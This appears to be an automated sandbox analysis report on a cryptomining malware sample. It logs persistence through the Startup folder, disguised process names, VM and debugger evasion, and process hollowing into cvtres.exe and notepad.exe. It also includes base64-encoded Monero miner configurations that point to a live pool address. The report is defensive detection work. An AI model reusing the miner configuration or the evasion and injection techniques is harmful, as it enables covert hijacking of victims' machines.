Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\notepad.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	System information queried: FirmwareTableInformation

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe TID: 6620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe TID: 5108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3008	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe TID: 4360	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

API call chain: ExitProcess graph end node

graph_0-24675

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: cfgi.33.dr	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogIjIwMC44My4xNDguNzk6MzMzMyIsDQoJCQkidXNlciI6ICJkMDZlZDYzNS02OGY2LTRlOWEtOTU1Yy00ODk5ZjVmNTdiOWEiLA0KCQkJInBhc3MiOiAieCIsDQoJCQkicmlnLWlkIjogbnVsbCwNCgkJCSJuaWNlaGFzaCI6IGZhbHNlLA0KCQkJImtlZXBhbGl2ZSI6IGZhbHNlLA0KCQkJImVuYWJsZWQiOiB0cnVlLA0KCQkJInRscyI6IGZhbHNlLA0KCQkJInRscy1maW5nZXJwcmludCI6IG51bGwsDQoJCQkiZGFlbW9uIjogZmFsc2UsDQoJCQkic2VsZi1zZWxlY3QiOiBudWxsDQoJCX0NCgldLA0KCSJwcmludC10aW1lIjogNjAsDQoJImhlYWx0aC1wcmludC10aW1lIjogNjAsDQoJInJldHJpZXMiOiA1LA0KCSJyZXRyeS1wYXVzZSI6IDUsDQoJInN5c2xvZyI6IGZhbHNlLA0KCSJ1c2VyLWFnZW50IjogbnVsbCwNCgkid2F0Y2giOiBmYWxzZQ0KfQA=
Source: wininit.exe, 0000001E.00000002.757243141.000001DF75F9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPl
Source: svchost.exe, 0000001A.00000002.776104815.000001B77265F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
Source: wininit.exe, 00000024.00000002.751008392.000002060EF65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: svchost.exe, 0000001A.00000002.776046978.000001B772649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.758350990.000001B76CE29000.00000004.00000020.00020000.00000000.sdmp, wininit.exe, 0000001E.00000002.757243141.000001DF75F9A000.00000004.00000020.00020000.00000000.sdmp, wininit.exe, 00000024.00000002.751008392.000002060EF65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001F.00000002.750213448.00000219D6E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: cfg.33.dr	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogIjIwMC44My4xNDguNzk6MzMzMyIsDQoJCQkidXNlciI6ICJkMDZlZDYzNS02OGY2LTRlOWEtOTU1Yy00ODk5ZjVmNTdiOWEiLA0KCQkJInBhc3MiOiAieCIsDQoJCQkicmlnLWlkIjogbnVsbCwNCgkJCSJuaWNlaGFzaCI6IGZhbHNlLA0KCQkJImtlZXBhbGl2ZSI6IGZhbHNlLA0KCQkJImVuYWJsZWQiOiB0cnVlLA0KCQkJInRscyI6IGZhbHNlLA0KCQkJInRscy1maW5nZXJwcmludCI6IG51bGwsDQoJCQkiZGFlbW9uIjogZmFsc2UsDQoJCQkic2VsZi1zZWxlY3QiOiBudWxsDQoJCX0NCgldLA0KCSJwcmludC10aW1lIjogNjAsDQoJImhlYWx0aC1wcmludC10aW1lIjogNjAsDQoJInJldHJpZXMiOiA1LA0KCSJyZXRyeS1wYXVzZSI6IDUsDQoJInN5c2xvZyI6IGZhbHNlLA0KCSJ1c2VyLWFnZW50IjogbnVsbCwNCgkid2F0Y2giOiBmYWxzZQ0KfQA=
Source: svchost.exe, 0000001F.00000002.754405999.00000219D6E3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BBDBC8 VirtualQuery,GetSystemInfo,

0_2_00BBDBC8

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BAA534
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BBB820
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BCA928 FindFirstFileExA,	0_2_00BCA928

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BC7363 mov eax, dword ptr fs:[00000030h]

0_2_00BC7363

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BC84EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BC84EF

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BCB610 GetProcessHeap,

0_2_00BCB610

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBEEB3 SetUnhandledExceptionFilter,	0_2_00BBEEB3
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBF07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BBF07B
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC84EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BC84EF
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BBED65

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\notepad.exe

Network Connect: 200.83.148.79 3333

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section unmapped: C:\Windows\SysWOW64\taskkill.exe base address: 400000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000	Jump to behavior
